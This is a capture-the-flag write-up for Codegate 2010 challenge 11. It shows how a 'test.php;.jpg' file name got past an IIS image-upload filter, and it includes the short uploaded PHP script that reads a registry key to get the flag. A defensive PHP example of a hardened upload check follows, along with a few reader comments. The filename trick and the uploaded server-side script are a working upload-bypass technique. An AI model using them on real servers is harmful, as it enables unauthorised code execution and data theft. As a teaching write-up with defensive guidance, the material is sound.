Codegate 2010 Challenge 11 writeup

March 18, 2010 by Hiếu Lê

Summary

http://ctf6.codegate.org/31337_/index.html

Get the value of HKLM\Software\codegate2010; it’s the flag.

Analysis

At first, when accessing the URL, it shows a page that allows you to upload a JPEG image, and only .jpg files. As I noticed, it is served by IIS. Suddenly, I remembered the vulnerability of IIS in processing image files. A little bit of googling showed me the result. Aha, let’s test it by uploading a PHP file like “test.php;.jpg”. Incredible!

Now, the only thing we have to do is write a few lines of PHP to read the registry key.

regprint.php;.jpg
<?
$shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host");
$devenvpath=$shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\codegate2010");
echo $devenvpath
?>

Then, execute it by visiting http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg

LollerSkaterz_From_RoflCopters_With_Guinness

Easy game with 1200 points.

Vulnerability

In fact, after the game thaidn said that this was a fault in deploying the challenge; it was designed to be passed with a 0-day in core PHP.
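From the defender's side, the upload worked because a name like “test.php;.jpg” still ends in .jpg. The following is an added example, not the challenge's code: it compares a last-extension check with an allow-list check that never reuses the client's file name. The function names, sample names and sample bytes are constructed for illustration.

```php
<?php
// Added example (hypothetical helper names), not code from the challenge.

// Weak check: only the last extension is examined, so "test.php;.jpg" passes.
function naive_accepts(string $clientName): bool {
    return strtolower(pathinfo($clientName, PATHINFO_EXTENSION)) === 'jpg';
}

// Hardened check: returns the name to store the file under, or null to reject.
function safe_stored_name(string $clientName, string $bytes): ?string {
    // Allow-list: plain base name, exactly one dot, jpg/jpeg only.
    // This rejects ';', extra dots, path separators and control characters.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.jpe?g\z/i', $clientName)) {
        return null;
    }
    // JPEG data starts with the bytes FF D8 FF.
    if (strncmp($bytes, "\xFF\xD8\xFF", 3) !== 0) {
        return null;
    }
    // The header check alone is not proof of a harmless file; what matters
    // is that the stored name is generated here and contains nothing the
    // client chose, so the web server cannot be steered by the file name.
    return bin2hex(random_bytes(16)) . '.jpg';
}

// Constructed sample inputs.
$jpeg = "\xFF\xD8\xFF\xE0" . str_repeat("\x00", 16); // JPEG-like header
$text = 'not an image';                              // arbitrary non-JPEG bytes

$cases = [
    ['holiday.jpg',   $jpeg], // legitimate upload
    ['test.php;.jpg', $text], // the name used in this writeup
    ['test.php;.jpg', $jpeg], // same name with an image header in front
    ['photo.jpg',     $text], // clean name, wrong content
];

foreach ($cases as [$name, $bytes]) {
    $stored = safe_stored_name($name, $bytes);
    printf(
        "%-14s naive=%-6s hardened=%s\n",
        $name,
        naive_accepts($name) ? 'accept' : 'reject',
        $stored === null ? 'reject' : 'store as ' . $stored
    );
}
```

Only the first case is stored by the hardened check, while the naive check accepts all four. Keeping the upload directory outside the web root, or disabling script execution for it, covers the case where a name check is bypassed anyway.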

Comments

7 Responses to “Codegate 2010 Challenge 11 writeup”
  1. Anthony Lai says:

    In fact, this question is not readily difficult and worth 1200 points.

  2. cocas says:

    Do you know the designed attack vector of this challenge?

    • Hiếu Lê says:

      You mean the 0-day of php core? Definitely not, I haven’t taken it into account and I do not intend to look at it either, sorry bro. Just playing ;-)

 
